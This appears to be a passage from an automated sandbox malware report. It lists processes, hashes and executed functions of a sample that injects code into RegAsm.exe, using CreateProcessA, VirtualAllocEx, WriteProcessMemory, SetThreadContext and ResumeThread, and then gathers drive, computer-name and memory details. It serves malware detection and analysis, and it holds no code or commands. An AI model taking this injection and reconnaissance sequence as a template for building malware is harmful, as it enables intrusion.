Imagebase:	0x480000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:08:19
Start date:	14/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:08:19
Start date:	14/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEB5.tmp" "c:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP"
Imagebase:	0x300000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:08:19
Start date:	14/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Imagebase:	0x610000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	22.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	114
Total number of Limit Nodes:	3

Executed Functions

Function 02D7280C Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02D72A4E

Memory Dump Source

Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: bdd0fe2894f45c359f2c57c17d937a9cd79668ecee18ba9cc0980f8bf7eb807e
Instruction ID: 3e0b3a03e5b078a47aece8240b2edb3c488ed513cf9ebd138ff063684a6974fb
Opcode Fuzzy Hash: bdd0fe2894f45c359f2c57c17d937a9cd79668ecee18ba9cc0980f8bf7eb807e
Instruction Fuzzy Hash: 43A15971D00259CFEB24CF68C8457AEBBB2BF48314F1481AAD819A7344EB799985CF91

Function 02D72818 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02D72A4E

Memory Dump Source

Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 025ac7e9fd0876cffbf02b59b9dff091b2955c643df67201d69c3f712b8968d1
Instruction ID: 674d42b727a9ac4c65c58c350d8769f269074ad52414acc1556ef5fbedac38aa
Opcode Fuzzy Hash: 025ac7e9fd0876cffbf02b59b9dff091b2955c643df67201d69c3f712b8968d1
Instruction Fuzzy Hash: 31915A71D00259CFEB24CF68C8457EEBBB2BF48314F1481AAD819A7344EB789985CF91

Function 02D72588 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02D72620

Memory Dump Source

Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5069f3570bfab7fdeea7770344d286285515e100d93db129b737b65d99330db4
Instruction ID: 0c89d2a041f3f1d9c484fb5651369f49be685ab1568c1a872f24a2654dca182f
Opcode Fuzzy Hash: 5069f3570bfab7fdeea7770344d286285515e100d93db129b737b65d99330db4
Instruction Fuzzy Hash: B72117719003499FCB10CFA9C885BEEBBF5FF48310F10842AE959A7241D7789945CBA4

Function 02D72590 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02D72620

Memory Dump Source

Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8ec95e32683f4dd6d627b82a9ff4813a7c7598e9c072872947d651f683f9981a
Instruction ID: 465a9fe54a79817866ae81011d1e922ec91d4fd4e10b01e01f8ae707077ecdac
Opcode Fuzzy Hash: 8ec95e32683f4dd6d627b82a9ff4813a7c7598e9c072872947d651f683f9981a
Instruction Fuzzy Hash: 9A21F4B59003499FCB10DFAAC885BEEBBF5FF48314F10842AE959A7240D7789944CBA4

Function 02D723F0 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02D72476

Memory Dump Source

Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 701be48d1d43efde76e92769bf6e3d3744a08cbacc9c388486702856d5afd64d
Instruction ID: adf6c62da0dd9cd1ccfbd75edd8b72459b4163cc334586b767e6a2b93fff4d7d
Opcode Fuzzy Hash: 701be48d1d43efde76e92769bf6e3d3744a08cbacc9c388486702856d5afd64d
Instruction Fuzzy Hash: 422114B19002498FDB14DFAAC4857EEBBF4AF98314F10842AD459A7241DB789985CFA0

Function 02D72679 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 02D72700

Memory Dump Source

Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0ddcc5c3e3908f1fbd5e5186772be9eec39bf8d3f138284e9776c94cf62d52d2
Instruction ID: 45a1498055397b83222c3964ea6d298dc63242be69a0b504803fc37dd03ff51a
Opcode Fuzzy Hash: 0ddcc5c3e3908f1fbd5e5186772be9eec39bf8d3f138284e9776c94cf62d52d2
Instruction Fuzzy Hash: DE2119B1D003499FCB14DFA9C985AEEBBF5FF88310F50842AE919A7250C7389945CBA0

Function 02D72680 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 02D72700

Memory Dump Source

Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 586d154cdcca0c9f45d2d4a82551137c67f4340d0b6f27407aaae2bdc253fbbd
Instruction ID: 9f0179a4ea90a6574c1162f516dfc0a63f2f8ca9f7fb5fc3d04c54e93f6ae71e
Opcode Fuzzy Hash: 586d154cdcca0c9f45d2d4a82551137c67f4340d0b6f27407aaae2bdc253fbbd
Instruction Fuzzy Hash: FC2138B1D003499FCB10DFAAC985AEEFBF5FF48310F50842AE919A7240D7389944CBA0

Function 02D723F8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02D72476

Memory Dump Source

Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d0a6a5b0860db3e6f5bae38f766e8d85ac974868d17b1abeb7dd22909223fae8
Instruction ID: 64ae528febbaa7ef71cff89eeb26ce44fc66ee6f038aa716cc873b47ca7ca5de
Opcode Fuzzy Hash: d0a6a5b0860db3e6f5bae38f766e8d85ac974868d17b1abeb7dd22909223fae8
Instruction Fuzzy Hash: 672104B19003098FDB14DFAAC4857AEBBF4EF88314F14842AD959A7340DB78A945CBA5

Function 02D724C9 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02D7253E

Memory Dump Source

Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 57f045a5e2b09bcfcc37358e5d64468a5dc762c0e1cc5b79c39d9e67330bfcd5
Instruction ID: 33ff29ecc680bc45dc18dc82fec983b264efea97f3b834dbecf32b36f68cd15e
Opcode Fuzzy Hash: 57f045a5e2b09bcfcc37358e5d64468a5dc762c0e1cc5b79c39d9e67330bfcd5
Instruction Fuzzy Hash: 2B1167718002489FCB14DFAAC804AEEBFF5FF88314F208419E919A7250C7399945CBA0

Function 02D724D0 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02D7253E

Memory Dump Source

Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 231d86c66d908e8d29354c41065f57142569f5250a9751aadd7a145225694656
Instruction ID: d517f41929d0cc37d65aab4a5fd8aed351dabfc2d0b395cf096a48d5060c2f58
Opcode Fuzzy Hash: 231d86c66d908e8d29354c41065f57142569f5250a9751aadd7a145225694656
Instruction Fuzzy Hash: 8B1126719002499FCB14DFAAC845AEEBBF5FF88314F208419E519A7250C779A944CBA0

Function 02D72340 Relevance: 1.6, APIs: 1, Instructions: 53
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 02D723AA

Memory Dump Source

Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3d98a461aaaf8c0ab74afbc2ad17718f9881721ed7d06d96b46323db5f8e46b7
Instruction ID: e811230e1488baf42a720cdb83a26a5c2f05b97297aba013a55fed8b9ccc58d3
Opcode Fuzzy Hash: 3d98a461aaaf8c0ab74afbc2ad17718f9881721ed7d06d96b46323db5f8e46b7
Instruction Fuzzy Hash: A01107B19002488EDB14DFAAD4456EEFBF5EB88314F20842AD459A7240C7795945CFA4

Function 02D72348 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 02D723AA

Memory Dump Source

Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7143c7b2d7d307ef637e4c5422c278fb04ed07a93d23b6572634867ce0c73b80
Instruction ID: bdf694a99920b83530dab8da374acac28789b07804f60bd7e92d5f8f7da3b996
Opcode Fuzzy Hash: 7143c7b2d7d307ef637e4c5422c278fb04ed07a93d23b6572634867ce0c73b80
Instruction Fuzzy Hash: 1F1128B19002488FCB14DFAAC4457AEFBF9EF88314F20841AD559A7340CB79A944CBA4

Analysis Process: RegAsm.exePID: 6484, Parent PID: 5700COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	69.8%
Total number of Nodes:	212
Total number of Limit Nodes:	19

Executed Functions

Function 0041CC70 Relevance: 28.1, Strings: 22, Instructions: 567
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!@, xrefs: 0041CCA3
j, xrefs: 0041CD27
c, xrefs: 0041CEC4
%, xrefs: 0041D2EB
k, xrefs: 0041D199
", xrefs: 0041D2F5
b, xrefs: 0041CEBF
a, xrefs: 0041CEBA
k, xrefs: 0041CD2F
!, xrefs: 0041D2F0
e, xrefs: 0041CD1F
j, xrefs: 0041D194
#, xrefs: 0041D118
j, xrefs: 0041D3E6
h, xrefs: 0041D3F6
h, xrefs: 0041CD37
e, xrefs: 0041D18F
h, xrefs: 0041D19E
, xrefs: 0041D109
#, xrefs: 0041D113
e, xrefs: 0041D3DE
k, xrefs: 0041D3EE

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: $!$!@$"$#$#$%$a$b$c$e$e$e$h$h$h$j$j$j$k$k$k
API String ID: 2994545307-1787479632
Opcode ID: 0d4b0a44f7c8528a5e12eac3f544b5e16b3e6cbd2342e5e50717689e85988588
Instruction ID: 4989aabf6bb3cfaf0020d327f722c038374d9a717f924aaf3cba47e85df5dec7
Opcode Fuzzy Hash: 0d4b0a44f7c8528a5e12eac3f544b5e16b3e6cbd2342e5e50717689e85988588
Instruction Fuzzy Hash: 4632A1B190C7808FD3248F28C4843AFBBE1AB96314F18496EE5D9873D2D7798885C75B

Function 004328D0 Relevance: 23.4, APIs: 11, Strings: 2, Instructions: 650
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0043E680,00000000,00000001,0043E670,00000000), ref: 004329C6
SysAllocString.OLEAUT32(F3A5F1A2), ref: 00432A36
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00432A7B
SysAllocString.OLEAUT32(FF0FF903), ref: 00432AE3
SysAllocString.OLEAUT32(93CF91C3), ref: 00432BC6
VariantInit.OLEAUT32(?), ref: 00432C39

Strings

\, xrefs: 00432983
C, xrefs: 0043297B

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: C$\
API String ID: 65563702-514332402
Opcode ID: deaaf2316ac3411dfe0e71c8231e18fc05c64fc47439bbff19a78a68c0f3b602
Instruction ID: 450e7a8da008b364592ca4d9c89790f2a980374ab3b6d0c135865a1c86b66da4
Opcode Fuzzy Hash: deaaf2316ac3411dfe0e71c8231e18fc05c64fc47439bbff19a78a68c0f3b602
Instruction Fuzzy Hash: 0B224372A083019BD320CF24CD4675BBBE5EF89714F14892EF5949B381D7B8E905CB96

Function 00413F3B Relevance: 20.2, APIs: 1, Strings: 10, Instructions: 929COMMON

Download Yara Rule

Strings

84, xrefs: 0041468C
NF0>, xrefs: 00414529
43AM, xrefs: 00414534
-)#, xrefs: 0041466B
ejkh, xrefs: 00413F70, 00413F87
!',$, xrefs: 00414676
R[_F, xrefs: 0041451E
IFM6, xrefs: 0041453F
HLA, xrefs: 00414C42
{z}, xrefs: 0041479E

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !',$$-)#$43AM$84$HLA$IFM6$NF0>$R[_F$ejkh${z}
API String ID: 0-826401997
Opcode ID: 9491196dd7273cf8ea6c1ac59ddf78724cb3725fc0d21b5717140c40a66c5d46
Instruction ID: ef02518879307af14c1e0ed1803bea8d752a275a36f9ab6d5d23519f41137339
Opcode Fuzzy Hash: 9491196dd7273cf8ea6c1ac59ddf78724cb3725fc0d21b5717140c40a66c5d46
Instruction Fuzzy Hash: 8F6225B69083808BD724CF24D8517EBB7E1EFD5314F18896EE8D987391E7399841CB4A

Function 0041E7B0 Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 454
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNEL32 ref: 0041EAE6

Strings

[=S3, xrefs: 0041EA35
A!_', xrefs: 0041EA1D
4I*O, xrefs: 0041EA4D
7AFG, xrefs: 0041EA5D
{u, xrefs: 0041EB8E
w5, xrefs: 0041ECCB
z, xrefs: 0041ECDB
d9M?, xrefs: 0041EA2D
ke, xrefs: 0041EBAE
)M4C, xrefs: 0041EA55

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: DrivesLogical
String ID: )M4C$4I*O$7AFG$A!_'$[=S3$d9M?$w5$z$ke${u
API String ID: 999431828-4249704212
Opcode ID: 318887a0b1beac27d9339757ab4c339f15d736c9ad875d69208a7d4b3533ee14
Instruction ID: 97945e5a585e135679ab7a5379a9d0594cb6c60c0c9a4d7849fc7c71e4e9bb01
Opcode Fuzzy Hash: 318887a0b1beac27d9339757ab4c339f15d736c9ad875d69208a7d4b3533ee14
Instruction Fuzzy Hash: 40E1A9B45083409BD310DF25E89166BBBF0FF86754F14892DF8D58B3A1E7B88945CB8A

Function 00432550 Relevance: 15.3, Strings: 12, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 00432809
%, xrefs: 004326E7
(, xrefs: 004325FC
+, xrefs: 004325F7
%, xrefs: 004325ED
*, xrefs: 004327FF
(, xrefs: 004326F6
+, xrefs: 004326F1
%, xrefs: 004327FA
+, xrefs: 00432804
*, xrefs: 004325F2
*, xrefs: 004326EC

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %$%$%$($($($*$*$*$+$+$+
API String ID: 0-447118901
Opcode ID: 15212c366cf0230e31e94e212d7e6711a7da25652ceff0a6a0acdb8934d1dfea
Instruction ID: 0d8063b59b7ee132a404753d830e1559a2df0a0afe1b4ddca97cad5f3c6ab623
Opcode Fuzzy Hash: 15212c366cf0230e31e94e212d7e6711a7da25652ceff0a6a0acdb8934d1dfea
Instruction Fuzzy Hash: 3DA1F13150C3808BD7049B28C65536FBFD1AB9A318F29696FD4C687392D6BEC885C74B

Function 0040CFFF Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040D00F

Strings

.'&!, xrefs: 0040D2CE
KO, xrefs: 0040D265
TR, xrefs: 0040D25E
OR, xrefs: 0040D26C
marshal-, xrefs: 0040D3AF

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Uninitialize
String ID: .'&!$KO$OR$TR$marshal-
API String ID: 3861434553-4186242872
Opcode ID: 9d51a3f42434fb4494f39143dd2913bf9920687ccccb745cf1108f45ec3071f9
Instruction ID: 7f7fa5454b712477f53d7ba3493d83c7b489f696a6d8d11aec5a24939f9f6a57
Opcode Fuzzy Hash: 9d51a3f42434fb4494f39143dd2913bf9920687ccccb745cf1108f45ec3071f9
Instruction Fuzzy Hash: B3B112B56047818FD325CF29C490B22BFE1BF56300B0986ADD4D68F7A2D738D84ACB95

Function 00408AF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 193
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00408B11
GetForegroundWindow.USER32 ref: 00408BFC
GetCurrentProcessId.KERNEL32 ref: 00408C0A
ExitProcess.KERNEL32 ref: 00408D3E

Strings

rXT, xrefs: 00408B28

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentProcess$ExitForegroundThreadWindow
String ID: rXT
API String ID: 3118123366-3474455373
Opcode ID: 215b5d317320f53d14b317407f0b617e1e5e2ae2c4ce312a1cd995ebf89164d0
Instruction ID: a48ae5f2dbf7af896a0be9dbeac3444838c46f2ab100e951c749278ec69ea455
Opcode Fuzzy Hash: 215b5d317320f53d14b317407f0b617e1e5e2ae2c4ce312a1cd995ebf89164d0
Instruction Fuzzy Hash: 7651F2B3B587040BC70CAD69DD9635AB6D78BC8210F0E843EA999D7391EE7CDC0942C5

Function 0040D922 Relevance: 8.2, Strings: 6, Instructions: 672
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U=]?, xrefs: 0040DF2F
&#(, xrefs: 0040DDD5
$I'K, xrefs: 0040DF8A
zqrs, xrefs: 0040DF98
BDB1EF992B1E438FCEC5E79E34E047A9, xrefs: 0040D96B, 0040DD3B
marshal-, xrefs: 0040DCB0, 0040E09F

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $I'K$&#($BDB1EF992B1E438FCEC5E79E34E047A9$U=]?$marshal-$zqrs
API String ID: 0-2016788731
Opcode ID: 09f7fef19c87c8c08c65c8ba6b2712a9c089114d081e09e92b66ed09c5d40dd8
Instruction ID: 9d7743ca4000fac8c06106522c551aed374992fbf3a393855c396fbbee45f38f
Opcode Fuzzy Hash: 09f7fef19c87c8c08c65c8ba6b2712a9c089114d081e09e92b66ed09c5d40dd8
Instruction Fuzzy Hash: 3622F2B16047418FD329CF2AC9A1A53BBE2FF56310B1A85ADC4968F762D738E805CF54

Function 00409A40 Relevance: 7.9, Strings: 6, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

qlgf, xrefs: 00409BDA
*,2., xrefs: 00409B45
DC, xrefs: 00409E6E
atmp, xrefs: 00409BD2
BDB1EF992B1E438FCEC5E79E34E047A9, xrefs: 00409B1A
TB]U, xrefs: 00409B14, 00409B1F, 00409B5D, 00409BC0, 00409C70, 00409CEA

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: *,2.$BDB1EF992B1E438FCEC5E79E34E047A9$DC$TB]U$atmp$qlgf
API String ID: 0-394132840
Opcode ID: e0a13c5811b57c562521df8a20c65ad90ef9dbde5e25f822dfa1ed7295016f0f
Instruction ID: eaea9df05184efdd0451a59c98752cb81c256bc9b68437fdf5e0cce1517d1c3a
Opcode Fuzzy Hash: e0a13c5811b57c562521df8a20c65ad90ef9dbde5e25f822dfa1ed7295016f0f
Instruction Fuzzy Hash: BCC1E2B154C7808BD714CF25D85176BBBE1EBC1314F188A6DE1E58B392DB78C80ACB5A

Function 00427A08 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 358
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00427E2C

Strings

_lnu, xrefs: 00427D61
CIBH, xrefs: 00427F86
~|*, xrefs: 00427A3C

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: CIBH$_lnu$~|*
API String ID: 3960555810-2807066908
Opcode ID: 90a9521c0778bfec3cb3917080456bc41fcc86a354a3f635dfe1db1de96cc68b
Instruction ID: 47696c91e9934e85dbb284fa9d7da731d2c39803ce524e0a164785f27f0d4e79
Opcode Fuzzy Hash: 90a9521c0778bfec3cb3917080456bc41fcc86a354a3f635dfe1db1de96cc68b
Instruction Fuzzy Hash: 0FB1D470608B918FE725CF36D4607A3BBE1AF52304F5888AEC0DB8B792D779A405CB55

Function 0042731B Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 482
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042749B
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00427536

Strings

cUkR, xrefs: 00427704

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName
String ID: cUkR
API String ID: 3545744682-1640818974
Opcode ID: 4352ea4f77dfbc1bb2416e8356b5a481a92e61bcc1112b7540e68fcce2a5ba3f
Instruction ID: 2631a9525a49a76b46fd2586bb9845f3148378d491b813c94ec1ab60cbf231dc
Opcode Fuzzy Hash: 4352ea4f77dfbc1bb2416e8356b5a481a92e61bcc1112b7540e68fcce2a5ba3f
Instruction Fuzzy Hash: 4FF1B270218B918EE725CF35C5507B3BBE19F66304F48899EC1EB8B293D779A406CB25

Function 0042730E Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 459
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042749B
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00427536

Strings

cUkR, xrefs: 00427704

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName
String ID: cUkR
API String ID: 3545744682-1640818974
Opcode ID: 8509d55dd6ccddc033a7daa05e627d9599f6055766af215d87809310fdad9889
Instruction ID: 08ad09fdb5d6a525c07c8799b6f8e1d68a2b57056c24ed5487a9e5388f6fa670
Opcode Fuzzy Hash: 8509d55dd6ccddc033a7daa05e627d9599f6055766af215d87809310fdad9889
Instruction Fuzzy Hash: 40F1F470218B918EE725CF35C4907A3FBE1EF56304F58895EC0EA8B782D779A406CB55

Function 00427D36 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00427E2C

Strings

_lnu, xrefs: 00427D61
CIBH, xrefs: 00427F86

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
